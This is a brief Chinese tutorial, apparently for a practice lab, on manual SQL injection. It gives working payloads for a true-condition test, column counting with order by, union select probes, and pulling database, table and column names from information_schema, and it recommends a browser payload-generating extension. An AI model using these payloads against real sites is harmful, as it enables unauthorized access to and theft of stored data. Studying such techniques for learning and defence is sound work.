(1)判断注入是字符型还是数值型
判断恒为真,字符型,输出ures表中全部用户信息。
1' or '123' = '123' #
(2)猜测SQL查询字段数
1后面加 ' 闭合 id 查询的 ' ' ,末尾加# 是注释了后面 ' 的内容,用order by来测试字段数。
查询换成3时出错,可见只有两个字段。
1' order by 2#
1' order by 3#
(3)确定显示的字段顺序
1 ' union select 1,2 #
(4)获取当前数据库名
1' union select 1, database() #
(5)获取当前数据库的表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
(6) 获取表中的字段名
1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#推荐工具 Harkbar
可以在浏览器中添加扩展,搜索Harkbar,添加扩展,使用快捷键F12选择Harkbar即可使用。
获取到字段数后其他查询语句可以直接使用Harkbar进行生成。
点击OK就会自动生成命令,直接使用就行了。